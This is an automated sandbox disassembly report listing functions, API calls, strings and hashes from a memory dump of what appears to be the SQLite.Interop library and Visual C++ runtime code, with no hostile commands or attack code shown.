SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,00000000,000000FF,000000FF,00000001,000000FF,non-deterministic use of %s() in %s,?,a generated column), ref: 6BC3D78A

Strings

a generated column, xrefs: 6BC3D752, 6BC3D761
an index, xrefs: 6BC3D759
non-deterministic use of %s() in %s, xrefs: 6BC3D766
a CHECK constraint, xrefs: 6BC3D749

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
API String ID: 3537641774-3705377941
Opcode ID: e08df82169077c04dc4a003d304688bc01d8340d0e9d68e1d7a61eb00f2c0292
Instruction ID: c1230e31cc05d6effe2592e8161899e9922058634ae5b81dc035febc02f8cce4
Opcode Fuzzy Hash: e08df82169077c04dc4a003d304688bc01d8340d0e9d68e1d7a61eb00f2c0292
Instruction Fuzzy Hash: 0A01F9B12241146BD620CF5CD841E3673D99B46738B500399F478CF2D0FB2AE9518751

Function 6BBD21DA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 6BBD21E1

Part of subcall function 6BBD63A2: GetLastError.KERNEL32(00000001,00000000,6BBD2367,6BBDC537,00000000,?,6BBD610E,00000000,00000001,00000000,?,6BBDC12D,00000018,6BD115D0,0000000C,6BBDC1BD), ref: 6BBD63A6
Part of subcall function 6BBD63A2: ___set_flsgetvalue.LIBCMT ref: 6BBD63B4
Part of subcall function 6BBD63A2: __calloc_crt.LIBCMT ref: 6BBD63C8
Part of subcall function 6BBD63A2: DecodePointer.KERNEL32(00000000,?,6BBD610E,00000000,00000001,00000000,?,6BBDC12D,00000018,6BD115D0,0000000C,6BBDC1BD,00000000,00000000,?,6BBD64C6), ref: 6BBD63E2
Part of subcall function 6BBD63A2: GetCurrentThreadId.KERNEL32 ref: 6BBD63F8
Part of subcall function 6BBD63A2: SetLastError.KERNEL32(00000000,?,6BBD610E,00000000,00000001,00000000,?,6BBDC12D,00000018,6BD115D0,0000000C,6BBDC1BD,00000000,00000000,?,6BBD64C6), ref: 6BBD6410

__calloc_crt.LIBCMT ref: 6BBD2203
__get_sys_err_msg.LIBCMT ref: 6BBD2221
_strcpy_s.LIBCMT ref: 6BBD2229
__invoke_watson.LIBCMT ref: 6BBD223E

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 6BBD21EE, 6BBD2211

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: 19b03157b715da6f4b9a70e4d47611f95fb6b4dc530c007a7f2cc913d2e2cdb9
Instruction ID: e1058a4be76b514c7c49b68e70d7ee1bc449e9acfca4ffae971285335c1550c9
Opcode Fuzzy Hash: 19b03157b715da6f4b9a70e4d47611f95fb6b4dc530c007a7f2cc913d2e2cdb9
Instruction Fuzzy Hash: C2F05932A48AD06BD2112A7EDC81C5F73ADDB86B6CB00053EFA059B100E72DDD414360

Function 6BC5CF80 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AA20,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5CFA9
SIdbdaa654d0b26d40.SQLITE.INTEROP(?,6BBFAF80,?), ref: 6BC5CFC8

Strings

%s at line %d of [%.10s], xrefs: 6BC5CFA2
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5CF93
misuse, xrefs: 6BC5CF9D

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.$Idbdaa654d0b26d40.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 1815078321-160653349
Opcode ID: 21fe0a83cc760104c15c5046c5ad5f2c221722c59eab6407e3c7b56d7468f7b0
Instruction ID: 200e54857228fe8e869c0e44396ac6a30257553f4a83fd1e2cc73e5af2abab17
Opcode Fuzzy Hash: 21fe0a83cc760104c15c5046c5ad5f2c221722c59eab6407e3c7b56d7468f7b0
Instruction Fuzzy Hash: 86F0B47776421426C6006AB97C02FCB775CCBD0679F004076FA0CEE181F718A63601EA

Function 6BBD62EE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BD114E0,00000008,6BBD63F6,00000000,00000000,?,6BBD610E,00000000,00000001,00000000,?,6BBDC12D,00000018,6BD115D0,0000000C), ref: 6BBD62FF
__lock.LIBCMT ref: 6BBD6333

Part of subcall function 6BBDC1A2: __mtinitlocknum.LIBCMT ref: 6BBDC1B8
Part of subcall function 6BBDC1A2: __amsg_exit.LIBCMT ref: 6BBDC1C4
Part of subcall function 6BBDC1A2: EnterCriticalSection.KERNEL32(00000000,00000000,?,6BBD64C6,0000000D,6BD11508,00000008,6BBD65BD,00000000,?,6BBD3311,00000000,6BD11440,00000008,6BBD3376,?), ref: 6BBDC1CC

InterlockedIncrement.KERNEL32(?), ref: 6BBD6340
__lock.LIBCMT ref: 6BBD6354
___addlocaleref.LIBCMT ref: 6BBD6372

Strings

KERNEL32.DLL, xrefs: 6BBD62FA

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: f46e30d84cbd58d1656012112b11eacbe9e74475fd10e2cbeb16e91b2448e26e
Instruction ID: cc1a454aa0c698a262b417398edd31ff293d5fabb06bac85215373efcc241b1a
Opcode Fuzzy Hash: f46e30d84cbd58d1656012112b11eacbe9e74475fd10e2cbeb16e91b2448e26e
Instruction Fuzzy Hash: B4011B71845B40EBE7209F7AD80674DFBE0AF51328F108A4ED49A966A0CBBCE645CF15

Function 6BC55EB0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000070D2,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC55ED9
DeleteCriticalSection.KERNEL32(?), ref: 6BC55EE5
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC55EEC

Strings

%s at line %d of [%.10s], xrefs: 6BC55ED2
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC55EC3
misuse, xrefs: 6BC55ECD

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: CriticalDeleteI769271af19a2299d.Iaa0f8e0c251cfd1d.Section
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 1777436853-160653349
Opcode ID: e2eabdd7726adaabe151314ccc871b9fcb36cb7cf7f8997abd0dbe4c9eb9db99
Instruction ID: 140568c9f3ec693433d3ce617958850d121213d61fe3f9a6ccbe087af099563e
Opcode Fuzzy Hash: e2eabdd7726adaabe151314ccc871b9fcb36cb7cf7f8997abd0dbe4c9eb9db99
Instruction Fuzzy Hash: 68E08673A6122467D9106AA8BC02DDB775C9B0167DB040062FA0DEE142FA5DEB6442F6

Function 6BC25960 Relevance: 9.3, APIs: 6, Instructions: 290COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC25A38
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC25A98
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC25B4C
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?), ref: 6BC25C00
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(0000000B,?,?,?), ref: 6BC25C5E

Part of subcall function 6BC0CC40: SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,6BC1D2C9,?,?,?,?,?,?), ref: 6BC0CC76

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,?,?), ref: 6BC25CD7

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID:
API String ID: 372259789-0
Opcode ID: b34c42173c138a5258b48ac5ae8de4106cb482b29b3dc2c6f25c2b7aeacc24a6
Instruction ID: 9cdeb6eeb6b3e44d557c5a0042aca00accf197b2802e217f1513766219bd12b5
Opcode Fuzzy Hash: b34c42173c138a5258b48ac5ae8de4106cb482b29b3dc2c6f25c2b7aeacc24a6
Instruction Fuzzy Hash: B1B1A174724601EBEB05DF78D4C27E7F3A4BB49318F400255DA2997208FB3AAA55CB92

Function 6BC1BCD0 Relevance: 9.2, APIs: 6, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f5d3f8071028d3df20fb02caeaba33d0455b4058431aeedad8a39113d3a5486
Instruction ID: 5c8932c16f98aefb0f61988b39fd15aae0d44589ba9016cff94505e2c60be56e
Opcode Fuzzy Hash: 1f5d3f8071028d3df20fb02caeaba33d0455b4058431aeedad8a39113d3a5486
Instruction Fuzzy Hash: 09A14974628B05CBCB25DF79C4806EBB3E1BF49308F100959D46AA7314FB3AAA45DF52

Function 6BC4B580 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 393COMMON

Download Yara Rule

APIs

SIffb8076c269e2a85.SQLITE.INTEROP ref: 6BC4B592
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC4B706
_memset.LIBCMT ref: 6BC4B850
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC4B965

Strings

(, xrefs: 6BC4B7FB

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.$Iffb8076c269e2a85._memset
String ID: (
API String ID: 2441030279-3887548279
Opcode ID: 5d0d20219b70adbc57dae109644ca87227361624c25eadfaa2bb812f9091f8fb
Instruction ID: 5fb132953d6a7bc7c30c9732faeef3f03cccdca662df02c0726dc94f6e4087a3
Opcode Fuzzy Hash: 5d0d20219b70adbc57dae109644ca87227361624c25eadfaa2bb812f9091f8fb
Instruction Fuzzy Hash: BFE18E70A257019FD714CF29C48079AB7F0FF88308F144AA9D8A98B651F739EB95CB91

Function 6BC6B570 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 369COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6BC6B8F8

Strings

%s at line %d of [%.10s], xrefs: 6BC6B965
database corruption, xrefs: 6BC6B960
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6B94A, 6BC6B956

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 372259789-2469029621
Opcode ID: 5ea3b8563fe38db893c4d1da903aba0b28402866f1d290b50d9ceb05a43a9b81
Instruction ID: 7d2a9068e160cc8a099e548b88b6296a4b32b60162686f44fce1163a7e65fe31
Opcode Fuzzy Hash: 5ea3b8563fe38db893c4d1da903aba0b28402866f1d290b50d9ceb05a43a9b81
Instruction Fuzzy Hash: 39D12371A142159BDB10CF68C8C2A6AB7B0FF49398F0441A9F959CB342F738EA51C7E1

Function 6BC2C9E0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 362COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC2CB0C

Strings

foreign key on %s should reference only one column of table %T, xrefs: 6BC2CA3A
unknown column "%s" in foreign key definition, xrefs: 6BC2CCA6
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6BC2CA63

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 2102423945-272990098
Opcode ID: 2e0eea4aa982c9b30d00dcdd1366bec3301a28c7ce8e1be8836996570c859e79
Instruction ID: 78a17331fb7cf2ff8c0e29242f62b2948ede76c960f6c7eb9f8bbbf8f760dfbb
Opcode Fuzzy Hash: 2e0eea4aa982c9b30d00dcdd1366bec3301a28c7ce8e1be8836996570c859e79
Instruction Fuzzy Hash: ABE1AE75E15205DFDB14CF68C480AAFBBB5FF49304F1485A9D859AB301E738EA45CBA0

Function 6BC4AC30 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 300COMMON

Download Yara Rule

APIs

SI5b914c29cf5a7984.SQLITE.INTEROP(?), ref: 6BC4AC90
SI8b0d9e6837e61abc.SQLITE.INTEROP(00000000), ref: 6BC4ACAC
SIffb8076c269e2a85.SQLITE.INTEROP ref: 6BC4ACBB
SI5b914c29cf5a7984.SQLITE.INTEROP(?), ref: 6BC4AD35

Strings

string or blob too big, xrefs: 6BC4AF2A

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I5b914c29cf5a7984.$I8b0d9e6837e61abc.Iffb8076c269e2a85.
String ID: string or blob too big
API String ID: 2728433035-2803948771
Opcode ID: b117a055ccca042187a560fa959a51e297ca112217670f664651deddc5c6fc9b
Instruction ID: de271ff0a6cb2053ad4acf9f29a886660c9b439236688c45f211c7bc6346c851
Opcode Fuzzy Hash: b117a055ccca042187a560fa959a51e297ca112217670f664651deddc5c6fc9b
Instruction Fuzzy Hash: AEA1D572929B514BE715CF68884025AB7A1AFC6329F180BBDF8B4873D0F739C7458752

Function 6BBD81B3 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6BBD81BF

Part of subcall function 6BBD641B: __getptd_noexit.LIBCMT ref: 6BBD641E
Part of subcall function 6BBD641B: __amsg_exit.LIBCMT ref: 6BBD642B

__amsg_exit.LIBCMT ref: 6BBD81DF
__lock.LIBCMT ref: 6BBD81EF
InterlockedDecrement.KERNEL32(?), ref: 6BBD820C
_free.LIBCMT ref: 6BBD821F
InterlockedIncrement.KERNEL32(05671668), ref: 6BBD8237

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: b9de3b5c901d95867417e2631b5ae5d66cbf19dc1e8e2e092e0546693e90a041
Instruction ID: 9d252b5991e29617d23df7dec70e70893ffe1b65932c68bfd52ab55a7b035da8
Opcode Fuzzy Hash: b9de3b5c901d95867417e2631b5ae5d66cbf19dc1e8e2e092e0546693e90a041
Instruction Fuzzy Hash: EB018032904EA1DBEB419B39980675DB7B0EF0A769F015149E810AB280CB3CA942CFE1

Function 6BC5D090 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 295COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A4DE,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,?,?,6BC6103B,00000012,6BCFF004,?,6BCC5752), ref: 6BC5D0BA

Strings

%s at line %d of [%.10s], xrefs: 6BC5D0B3
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5D0A4
misuse, xrefs: 6BC5D0AE

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: a51d2936a76a22a58464aa770ebefebed317acfd32e8620ca8d7905c74ac48c9
Instruction ID: f85ea2da228145a123815be8d124838e931d2cdfcaa90daad9b1d819290c9b35
Opcode Fuzzy Hash: a51d2936a76a22a58464aa770ebefebed317acfd32e8620ca8d7905c74ac48c9
Instruction Fuzzy Hash: 1E8162377491094BEB00DE5DBC8259DF791F78A23AB9442BBEE0CDB700E536C9258B91

Function 6BC4D2F0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 215COMMON

Download Yara Rule

Strings

{, xrefs: 6BC4D37E
json_object() requires an even number of arguments, xrefs: 6BC4D334
json_object() labels must be TEXT, xrefs: 6BC4D57D
d, xrefs: 6BC4D36B

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: d$json_object() labels must be TEXT$json_object() requires an even number of arguments${
API String ID: 0-256717443
Opcode ID: ada3408273d77e6ed2e22401c42fbf5d280d058e7b678b1b9d8572666bfe652f
Instruction ID: 87f46cf52cee6201f57b846918995123b66dc5ad531ed80cfeaf3ab261a21453
Opcode Fuzzy Hash: ada3408273d77e6ed2e22401c42fbf5d280d058e7b678b1b9d8572666bfe652f
Instruction Fuzzy Hash: 90819E716583408FD300EF28C491B5BB7E1BB85368F444A9DF8999B291E738EB45CB92

Function 6BC857B0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 213COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011ADC,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,00000000,?,?,?,?,6BC8AEB6), ref: 6BC858E6
